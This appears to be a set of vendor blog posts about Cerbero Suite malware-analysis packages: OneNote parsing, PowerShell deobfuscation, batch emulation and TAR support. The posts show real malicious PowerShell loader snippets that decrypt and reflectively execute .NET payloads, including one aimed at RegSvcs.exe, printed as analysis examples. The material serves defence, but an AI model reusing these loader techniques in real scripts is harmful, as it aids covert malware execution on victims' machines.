As of today, the “OneNote Format” package is available to all licenses of Cerbero Suite! The package was previously released for commercial licenses only.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
We have released version 2.0 of our commercial PowerShell Beautifier package. The new release adds the option to remove unused variables.
For example, this is a snippet of a malicious script:
$T = 'Get'
$M = $T + 'Method'
$I = 'Invoke'
$T = $T + 'Type'
$L = 'Load'
$Q0 = [Reflection.Assembly]
$B = $Q0::$L($MyS)
$B = $B.$T('NewPE2.PE')
$B = $B.$M('Execute')
$Ub = 'C:\Windows\Microsoft'
$z = $Ub + '.NET\Framewor'
$VT = $z + 'k\v4.0.30'
$XQ = $VT + '319\RegSvcs.exe'
$B = $B.$I($null,[object[]] ($XQ,$serv))
With both variable replacement and removal of unused variables enabled it becomes:
$load_result = [Reflection.Assembly]::Load($x_result)
$get_type_result = $load_result.GetType('NewPE2.PE')
$get_method_result = $get_type_result.GetMethod('Execute')
$invoke_result = $get_method_result.Invoke($null, [object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', $x_result_2))
We have released the “TAR Format” package for all licenses of Cerbero Suite Standard and Advanced.
The package is also exposed to the SDK:
from Pro.Core import *
from Pkg.TAR import *
def parseTARArchive(fname):
c = createContainerFromFile(fname)
if c.isNull():
return
obj = TARObject()
if not obj.Load(c) or not obj.ParseArchive():
return
curoffs = None
while True:
entry, curoffs = obj.NextEntry(curoffs)
if entry == None:
break
# skip directories
if obj.IsDirectory(entry):
continue
print("file name:", entry.name, "file offset:", str(entry.offset_data), "file size:", str(entry.size))
# retrieves the file data as NTContainer
fc = obj.GetEntryData(entry)
We recently released three commercial packages: OneNote Format, Simple Batch Emulator and PowerShell Beautifier.
In this release we moved a number of features to optional packages so that we can more rapidly update them. Cerbero Store now has the following additional packages:
– JavaScript Beautifier (all licenses)
– EML Format (all advanced licenses)
– Torrent Format (all advanced licenses)
– ShellcodeToExecutable (all advanced licenses)
– Tor Downloader (all advanced licenses)
– Python Snippets (all licenses)
We have also reached another important milestone in the SDK documentation process, as it now features the complete guide on how to create plugins and extensions for Cerbero Suite and Cerbero Engine.
We also improved syntax highlighting and fixed various bugs.
An interesting sample containing a number of different obfuscation techniques. In this article we analyze the dropper in detail and reach the final stage.
SHA256: 0B93B5287841CEF2C6B2F2C3221C59FFD61BF772CD0D8B2BDAB9DADEB570C7A6
The first file we encounter is a OneNote document. If the “OneNote Format” package is installed, all files are automatically extracted.
PowerShell code is often seen in malware. To help the analysis of such code we have just released the “PowerShell Beautifier” package. The package is available to all commercial licenses of Cerbero Suite Advanced.
The package features a complete parser for the PowerShell language and has many deobfuscation capabilities. If your organization is interested in integrating our PowerShell beautifier in a cloud service, please contact us.
The beautifier can be invoked as an action: Ctrl+R -> PowerShell -> PowerShell Beautifier.
Let’s look at an example of obfuscated PowerShell code:
$mcWPL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join
'')('%~f0').Split([Environment]::NewLine);foreach ($jBqHb in $mcWPL) { if
($jBqHb.StartsWith(':: ')) { $qUflk = $jBqHb.Substring(3); break; }; };$AKzOG =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qUflk);$GTqqO =
New-Object System.Security.Cryptography.AesManaged;$GTqqO.Mode =
[System.Security.Cryptography.CipherMode]::CBC;$GTqqO.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$GTqqO.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join
'')('rYCDvAfAeZYTmiLeZKnw0z4us9jgkCckB7mS60qxxg4=');$GTqqO.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join
'')('JYh62EWEKCuIH7WrUJ0VdA==');$QTfFw = $GTqqO.CreateDecryptor();$AKzOG =
$QTfFw.TransformFinalBlock($AKzOG, 0,
$AKzOG.Length);$QTfFw.Dispose();$GTqqO.Dispose();$xVFCH = New-Object
System.IO.MemoryStream(, $AKzOG);$qGLhv = New-Object
System.IO.MemoryStream;$wRtOX = New-Object
System.IO.Compression.GZipStream($xVFCH,
[IO.Compression.CompressionMode]::Decompress);$wRtOX.CopyTo($qGLhv);$wRtOX.Dispose
();$xVFCH.Dispose();$qGLhv.Dispose();$AKzOG = $qGLhv.ToArray();$VBqqY =
[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AKzOG);$ReoQh =
$VBqqY.EntryPoint;$ReoQh.Invoke($null, (, [string[]] ('%*')))
To help in the analysis of malware which uses Windows batch scripts we just released a package on Cerbero Store called “Simple Batch Emulator”. The name of the package is self-explanatory as it provides a basic emulator for batch scripts. The package is available to all commercial licenses of Cerbero Suite Advanced.
The following is a malicious OneNote document. All embedded files are automatically extracted thanks to the “OneNote Format” package.
Two of the embedded files are batch scripts. We can execute the action to emulate the obfuscated batch code.
The malicious OneNote sample analyzed in this video contains an executable. The executable contains a CAB archive in a resource entry. The CAB archive contains a VBS script which can directly be inspected in Cerbero Suite.
SHA256: F408EF3FA89546483BA63F58BE3F27A98795655EB4B9B6217CBE302A5BA9D5F7
Microsoft OneNote is rising in popularity as a vector for malware. Therefore, all commercial licenses of Cerbero Suite can now download our “OneNote Format” package from Cerbero Store which parses the OneNote format and extracts embedded files.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
The 2nd issue of Cerbero Journal, our company e-zine, is out!
In this issue we discuss the release of Cerbero Suite 6 and Cerbero Engine 3, new and improved cloud packages, improvements to our PDF parser, PDF malware hiding in images, one way we tested Cerbero Suite on the field and much more!
